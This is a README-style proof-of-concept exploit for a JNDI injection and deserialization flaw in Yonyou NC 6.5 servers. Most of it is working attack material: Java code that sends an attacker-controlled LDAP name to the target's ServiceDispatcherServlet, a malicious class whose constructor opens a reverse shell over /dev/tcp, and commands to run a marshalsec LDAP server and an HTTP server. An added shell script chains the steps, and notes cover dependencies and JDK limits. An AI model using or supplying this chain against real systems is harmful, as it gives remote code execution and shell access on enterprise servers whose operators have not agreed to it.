0: Yonyou NC 6.5 deserialization: required dependency jars

0x01: Attack Java code

```java
import nc.bs.framework.common.NCLocator;

import java.util.Properties;

public class poc {

    // url: base URL of the target NC 6.5 server; jndipath: the JNDI name sent with the lookup
    public static void attack(String url, String jndipath) {
        Properties env = new Properties();
        if (!url.startsWith("http")) {
            url = "http://" + url;
        }
        // NCLocator reads the dispatcher endpoint from this property
        env.put("SERVICEDISPATCH_URL", url + "/ServiceDispatcherServlet");
        NCLocator locator = NCLocator.getInstance(env);
        // the lookup request carrying the attacker-controlled name is sent to ServiceDispatcherServlet
        locator.lookup(jndipath);
    }

    public static void main(String[] args) {
        // target NC server, and the malicious LDAP server started in 0x03
        attack("http://192.168.1.1:81", "ldap://192.168.1.2:1099/remote");
    }
}
```

Running it mostly fails with ClassNotFound; the required third-party jars are:

  • ncdepend.jar
  • log4j-1.2.15.jar
  • log.jar
  • Some of these dependency jars are present after an NC 6.5 installation, usually under C://yonyou//home//lib//, which requires having the NC 6.5 installer; alternatively, download the dependency package from the repository:
    • yonyou-nc6.5-lib
  • Local runtime environment:

    java version "1.8.0_181"
    Java(TM) SE Runtime Environment (build 1.8.0_181-b13)
    Java HotSpot(TM) 64-Bit Server VM (build 25.181-b13, mixed mode)

    javac 1.8.0_181

Sample output when the PoC runs:

```text
[anonymous] DEBUG  - Invoke nc.bs.framework.server.RemoteMetaContext.lookup write info to server spend time: 188 
Exception in thread "main" nc.bs.framework.exception.FrameworkIOException: Remote request error
```

0x02: Malicious Java class for remote exploitation

```java
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.Serializable;
import java.util.Hashtable;

// Served as remote.class over HTTP and referenced by the LDAP server (see 0x03).
// The payload lives in the no-arg constructor, so it fires as soon as the JNDI client
// instantiates the class; getObjectInstance is never needed for the effect.
public class remote implements ObjectFactory, Serializable {

    public remote() {
        try{
            // reverse shell; replace ip/port with the listener address before compiling
            java.lang.Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","sh -i >& /dev/tcp/ip/port 0>&1"});
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        return null;
    }
}
```

0x03: Usage

  • JetBrains IDEA: File -> New -> Project -> Java
  • Malicious LDAP server: java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.1.2:8000/#remote" 1099
  • HTTP server serving remote.class (port 8000 by default): python3 -m http.server
  • Fill in the attack url & jndipath in the main method, then run poc.main().
  • enjoy.
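The steps above, chained into one script. This is an added example written for this page, not a script from the repository. It assumes the three jars from 0x01 are in a directory passed as LIBDIR, that poc.java and remote.java are in SRCDIR, that marshalsec-0.0.3-SNAPSHOT-all.jar is in the current directory, and that the attacker host and ports are the ones the README uses (192.168.1.2, HTTP 8000, LDAP 1099); check_deps exists because the ClassNotFound failure from 0x01 is the usual reason the PoC does nothing.

```shell
#!/bin/sh
# Added helper for the 0x01/0x03 steps (not part of the original repository).
# Assumed layout: jars in LIBDIR, poc.java + remote.java in SRCDIR,
# marshalsec-0.0.3-SNAPSHOT-all.jar in the current directory.

# Jars the PoC needs on the classpath, exactly as listed in 0x01.
NC_JARS="ncdepend.jar log4j-1.2.15.jar log.jar"

# nc_classpath LIBDIR
# Prints the classpath: the three jars in LIBDIR, then "." for compiled classes.
nc_classpath() {
    _lib=$1
    _cp=""
    for _jar in $NC_JARS; do
        _cp="${_cp:+$_cp:}$_lib/$_jar"
    done
    printf '%s\n' "$_cp:."
}

# check_deps LIBDIR
# Returns 0 when every jar is present; otherwise names each missing jar on
# stderr and returns 1 (running without them gives the ClassNotFound from 0x01).
check_deps() {
    _lib=$1
    _rc=0
    for _jar in $NC_JARS; do
        if [ ! -f "$_lib/$_jar" ]; then
            echo "missing dependency: $_lib/$_jar" >&2
            _rc=1
        fi
    done
    return $_rc
}

# compile_poc LIBDIR SRCDIR
# remote.java needs only the JDK; poc.java needs ncdepend.jar for NCLocator.
compile_poc() {
    check_deps "$1" || return 1
    javac -cp "$(nc_classpath "$1")" -d "$2" "$2/remote.java" "$2/poc.java"
}

# run_chain LIBDIR SRCDIR
# 1. serve remote.class over HTTP on 8000 from SRCDIR
# 2. start the marshalsec LDAP reference server on 1099 pointing at it
# 3. run poc.main(), which sends the ldap:// name to the target's ServiceDispatcherServlet
run_chain() {
    compile_poc "$1" "$2" || return 1
    (cd "$2" && python3 -m http.server 8000) &
    _http=$!
    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer \
        "http://192.168.1.2:8000/#remote" 1099 &
    _ldap=$!
    sleep 2
    java -cp "$(nc_classpath "$1"):$2" poc
    kill "$_http" "$_ldap" 2>/dev/null
}

# Usage: sh nc_chain.sh run /path/to/lib /path/to/src  (no side effects when sourced)
if [ "${1:-}" = "run" ]; then
    run_chain "$2" "$3"
fi
```

Two caveats worth keeping in mind: remote.class is fetched and instantiated by whichever JVM performs the JNDI lookup, and JDKs from 8u191 onward ship with com.sun.jndi.ldap.object.trustURLCodebase=false, which blocks loading a class from an LDAP-supplied codebase; and javac 1.8 emits class-file version 52, so the payload class will not load on a JVM older than that.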

0x04: References